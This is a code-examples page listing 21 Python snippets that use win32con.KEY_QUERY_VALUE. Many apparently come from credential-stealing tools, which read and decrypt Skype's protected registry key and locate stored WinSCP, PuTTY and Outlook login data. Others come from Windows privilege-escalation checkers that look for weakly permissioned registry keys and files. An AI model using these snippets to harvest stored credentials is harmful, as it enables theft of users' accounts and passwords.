Python win32con.KEY_QUERY_VALUE Examples

The following are 21 code examples of win32con.KEY_QUERY_VALUE(). You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may also want to check out all available functions/classes of the module win32con , or try the search function .
Example #1
Source File: skype.py    From Radium with Apache License 2.0 7 votes vote down vote up
def get_regkey(self):
        try:
            accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
            keyPath = 'Software\\Skype\\ProtectedStorage'

            try:
                hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
            except Exception, e:
                print e
                return ''

            num = win32api.RegQueryInfoKey(hkey)[1]
            k = win32api.RegEnumValue(hkey, 0)

            if k:
                key = k[1]
                return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] 
Example #2
Source File: windows-privesc-check.py    From WHP with Do What The F*ck You Want To Public License 6 votes vote down vote up
def get_system_path():
	# HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
	key_string = 'SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
	try:
		keyh = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, key_string , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
	except:
		return None
		
	try:
		path, type = win32api.RegQueryValueEx(keyh, "PATH")
		return path
	except:
		return None
				
#name=sys.argv[1]
#if not os.path.exists(name):
	#print name, "does not exist!"
	#sys.exit() 
Example #3
Source File: skype.py    From BrainDamage with Apache License 2.0 6 votes vote down vote up
def get_regkey(self):
        try:
            accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
            keyPath = 'Software\\Skype\\ProtectedStorage'

            try:
                hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
            except Exception, e:
                # print e
                return ''

            num = win32api.RegQueryInfoKey(hkey)[1]
            k = win32api.RegEnumValue(hkey, 0)

            if k:
                key = k[1]
                return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] 
Example #4
Source File: windowsprivcheck.py    From LHF with GNU General Public License v3.0 6 votes vote down vote up
def get_system_path():
	# HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
	key_string = 'SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
	try:
		keyh = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, key_string , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
	except:
		return None
		
	try:
		path, type = win32api.RegQueryValueEx(keyh, "PATH")
		return path
	except:
		return None
				
#name=sys.argv[1]
#if not os.path.exists(name):
	#print name, "does not exist!"
	#sys.exit() 
Example #5
Source File: windowsprivcheck.py    From LHF with GNU General Public License v3.0 6 votes vote down vote up
def get_user_paths():
	try:
		keyh = win32api.RegOpenKeyEx(win32con.HKEY_USERS, None , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
	except:
		return 0
	paths = []
	subkeys = win32api.RegEnumKeyEx(keyh)
	for subkey in subkeys:
		try:
			subkeyh = win32api.RegOpenKeyEx(keyh, subkey[0] + "\\Environment" , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
		except:
			pass
		else:
			subkey_count, value_count, mod_time = win32api.RegQueryInfoKey(subkeyh)
			
			try:
				path, type = win32api.RegQueryValueEx(subkeyh, "PATH")
				paths.append((subkey[0], path))
			except:
				pass
	return paths 
Example #6
Source File: windowsprivcheck.py    From LHF with GNU General Public License v3.0 6 votes vote down vote up
def check_registry():
	for key_string in reg_paths:
		parts = key_string.split("\\")
		hive = parts[0]
		key_string = "\\".join(parts[1:])
		try:
			keyh = win32api.RegOpenKeyEx(getattr(win32con, hive), key_string, 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
		except:
			#print "Can't open: " + hive + "\\" + key_string
			continue
		
		sd = win32api.RegGetKeySecurity(keyh, win32security.DACL_SECURITY_INFORMATION | win32security.OWNER_SECURITY_INFORMATION)
		weak_perms = check_weak_write_perms_by_sd(hive + "\\" + key_string, 'reg', sd)
		if weak_perms:
			vprint(hive + "\\" + key_string)
			#print weak_perms
			if verbose == 0:
				sys.stdout.write(".")
			save_issue("WPC003", "writable_reg_paths", weak_perms)
			# print_weak_perms("x", weak_perms)
	print

# TODO save_issue("WPC009", "writable_eventlog_key", weak_perms)  # weak perms on event log reg key 
Example #7
Source File: windows-privesc-check.py    From WHP with Do What The F*ck You Want To Public License 6 votes vote down vote up
def get_user_paths():
	try:
		keyh = win32api.RegOpenKeyEx(win32con.HKEY_USERS, None , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
	except:
		return 0
	paths = []
	subkeys = win32api.RegEnumKeyEx(keyh)
	for subkey in subkeys:
		try:
			subkeyh = win32api.RegOpenKeyEx(keyh, subkey[0] + "\\Environment" , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
		except:
			pass
		else:
			subkey_count, value_count, mod_time = win32api.RegQueryInfoKey(subkeyh)
			
			try:
				path, type = win32api.RegQueryValueEx(subkeyh, "PATH")
				paths.append((subkey[0], path))
			except:
				pass
	return paths 
Example #8
Source File: windows-privesc-check.py    From WHP with Do What The F*ck You Want To Public License 6 votes vote down vote up
def check_registry():
	for key_string in reg_paths:
		parts = key_string.split("\\")
		hive = parts[0]
		key_string = "\\".join(parts[1:])
		try:
			keyh = win32api.RegOpenKeyEx(getattr(win32con, hive), key_string, 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
		except:
			#print "Can't open: " + hive + "\\" + key_string
			continue
		
		sd = win32api.RegGetKeySecurity(keyh, win32security.DACL_SECURITY_INFORMATION | win32security.OWNER_SECURITY_INFORMATION)
		weak_perms = check_weak_write_perms_by_sd(hive + "\\" + key_string, 'reg', sd)
		if weak_perms:
			vprint(hive + "\\" + key_string)
			#print weak_perms
			if verbose == 0:
				sys.stdout.write(".")
			save_issue("WPC003", "writable_reg_paths", weak_perms)
			# print_weak_perms("x", weak_perms)
	print

# TODO save_issue("WPC009", "writable_eventlog_key", weak_perms)  # weak perms on event log reg key 
Example #9
Source File: win32serviceutil.py    From ironpython2 with Apache License 2.0 5 votes vote down vote up
def _GetServiceShortName(longName):
    # looks up a services name
    # from the display name
    # Thanks to Andy McKay for this code.
    access = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services", 0, access)
    num = win32api.RegQueryInfoKey(hkey)[0]
    longName = longName.lower()
    # loop through number of subkeys
    for x in range(0, num):
    # find service name, open subkey
        svc = win32api.RegEnumKey(hkey, x)
        skey = win32api.RegOpenKey(hkey, svc, 0, access)
        try:
            # find display name
            thisName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
            if thisName.lower() == longName:
                return svc
        except win32api.error:
            # in case there is no key called DisplayName
            pass
    return None

# Open a service given either it's long or short name. 
Example #10
Source File: winscp.py    From Radium with Apache License 2.0 5 votes vote down vote up
def check_winscp_installed(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        try:
            key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER,
                                      'Software\Martin Prikryl\WinSCP 2\Configuration\Security', 0, accessRead)
            return True
        except Exception, e:
            return False 
Example #11
Source File: outlook.py    From Radium with Apache License 2.0 5 votes vote down vote up
def run(self):

        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'

        try:
            hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
        except Exception, e:
            return 
Example #12
Source File: putty.py    From Radium with Apache License 2.0 5 votes vote down vote up
def get_default_database(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\ACS\\PuTTY Connection Manager', 0, accessRead)
        thisName = str(win32api.RegQueryValueEx(key, 'DefaultDatabase')[0])
        if thisName:
            return thisName
        else:
            return ' ' 
Example #13
Source File: winscp.py    From Radium with Apache License 2.0 5 votes vote down vote up
def get_logins_info(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        try:
            key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0,
                                      accessRead)
        except Exception, e:
            return False 
Example #14
Source File: winscp.py    From BrainDamage with Apache License 2.0 5 votes vote down vote up
def check_winscp_installed(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        try:
            key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER,
                                      'Software\Martin Prikryl\WinSCP 2\Configuration\Security', 0, accessRead)
            return True
        except Exception, e:
            return False 
Example #15
Source File: winscp.py    From BrainDamage with Apache License 2.0 5 votes vote down vote up
def check_masterPassword(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Configuration\Security',
                                  0, accessRead)
        thisName = str(win32api.RegQueryValueEx(key, 'UseMasterPassword')[0])

        if thisName == '0':
            return False
        else:
            return True 
Example #16
Source File: winscp.py    From BrainDamage with Apache License 2.0 5 votes vote down vote up
def get_logins_info(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        try:
            key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0,
                                      accessRead)
        except Exception, e:
            return False 
Example #17
Source File: putty.py    From BrainDamage with Apache License 2.0 5 votes vote down vote up
def get_default_database(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\ACS\\PuTTY Connection Manager', 0, accessRead)
        thisName = str(win32api.RegQueryValueEx(key, 'DefaultDatabase')[0])
        if thisName:
            return thisName
        else:
            return ' ' 
Example #18
Source File: outlook.py    From BrainDamage with Apache License 2.0 5 votes vote down vote up
def run(self):

        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'

        try:
            hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
        except Exception, e:
            return 
Example #19
Source File: winscp.py    From Radium with Apache License 2.0 5 votes vote down vote up
def check_masterPassword(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Configuration\Security',
                                  0, accessRead)
        thisName = str(win32api.RegQueryValueEx(key, 'UseMasterPassword')[0])

        if thisName == '0':
            return False
        else:
            return True 
Example #20
Source File: windows-privesc-check.py    From WHP with Do What The F*ck You Want To Public License 4 votes vote down vote up
def check_event_logs():
	key_string = "HKEY_LOCAL_MACHINE\\" + eventlog_key_hklm
	try:
		keyh = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, eventlog_key_hklm , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
	except:
		print "Can't open: " + key_string
		return 0
		
	subkeys = win32api.RegEnumKeyEx(keyh)
	for subkey in subkeys:
		# print key_string + "\\" + subkey[0]
		sys.stdout.write(".")
		try:
			subkeyh = win32api.RegOpenKeyEx(keyh, subkey[0] , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
		except:
			print "Can't open: " + key_string
		else:
			subkey_count, value_count, mod_time = win32api.RegQueryInfoKey(subkeyh)
			# print "\tChild Nodes: %s subkeys, %s values" % (subkey_count, value_count)
			
			try:
				filename, type = win32api.RegQueryValueEx(subkeyh, "DisplayNameFile")
			except:
				pass
			else:
				weak_perms = check_weak_write_perms(os.path.expandvars(filename), 'file')
				if weak_perms:
					# print "------------------------------------------------"
					# print "Weak permissions found on event log display DLL:"
					# print_weak_perms("File", weak_perms)
					sys.stdout.write("!")
					save_issue("WPC008", "writable_eventlog_dll", weak_perms)
				
			try:
				filename, type = win32api.RegQueryValueEx(subkeyh, "File")
			except:
				pass
			else:
				weak_perms = check_weak_write_perms(os.path.expandvars(filename), 'file')
				if weak_perms:
					# print "------------------------------------------------"
					# print "Weak permissions found on event log file:"
					# print_weak_perms("File", weak_perms)
					sys.stdout.write("!")
					save_issue("WPC007", "writable_eventlog_file", weak_perms)
	print
		#sd = win32api.RegGetKeySecurity(subkeyh, win32security.DACL_SECURITY_INFORMATION) # TODO: get owner too?
		#print "\tDACL: " + win32security.ConvertSecurityDescriptorToStringSecurityDescriptor(sd, win32security.SDDL_REVISION_1, win32security.DACL_SECURITY_INFORMATION) 
Example #21
Source File: windowsprivcheck.py    From LHF with GNU General Public License v3.0 4 votes vote down vote up
def check_event_logs():
	key_string = "HKEY_LOCAL_MACHINE\\" + eventlog_key_hklm
	try:
		keyh = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, eventlog_key_hklm , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
	except:
		print "Can't open: " + key_string
		return 0
		
	subkeys = win32api.RegEnumKeyEx(keyh)
	for subkey in subkeys:
		# print key_string + "\\" + subkey[0]
		sys.stdout.write(".")
		try:
			subkeyh = win32api.RegOpenKeyEx(keyh, subkey[0] , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
		except:
			print "Can't open: " + key_string
		else:
			subkey_count, value_count, mod_time = win32api.RegQueryInfoKey(subkeyh)
			# print "\tChild Nodes: %s subkeys, %s values" % (subkey_count, value_count)
			
			try:
				filename, type = win32api.RegQueryValueEx(subkeyh, "DisplayNameFile")
			except:
				pass
			else:
				weak_perms = check_weak_write_perms(os.path.expandvars(filename), 'file')
				if weak_perms:
					# print "------------------------------------------------"
					# print "Weak permissions found on event log display DLL:"
					# print_weak_perms("File", weak_perms)
					sys.stdout.write("!")
					save_issue("WPC008", "writable_eventlog_dll", weak_perms)
				
			try:
				filename, type = win32api.RegQueryValueEx(subkeyh, "File")
			except:
				pass
			else:
				weak_perms = check_weak_write_perms(os.path.expandvars(filename), 'file')
				if weak_perms:
					# print "------------------------------------------------"
					# print "Weak permissions found on event log file:"
					# print_weak_perms("File", weak_perms)
					sys.stdout.write("!")
					save_issue("WPC007", "writable_eventlog_file", weak_perms)
	print
		#sd = win32api.RegGetKeySecurity(subkeyh, win32security.DACL_SECURITY_INFORMATION) # TODO: get owner too?
		#print "\tDACL: " + win32security.ConvertSecurityDescriptorToStringSecurityDescriptor(sd, win32security.SDDL_REVISION_1, win32security.DACL_SECURITY_INFORMATION)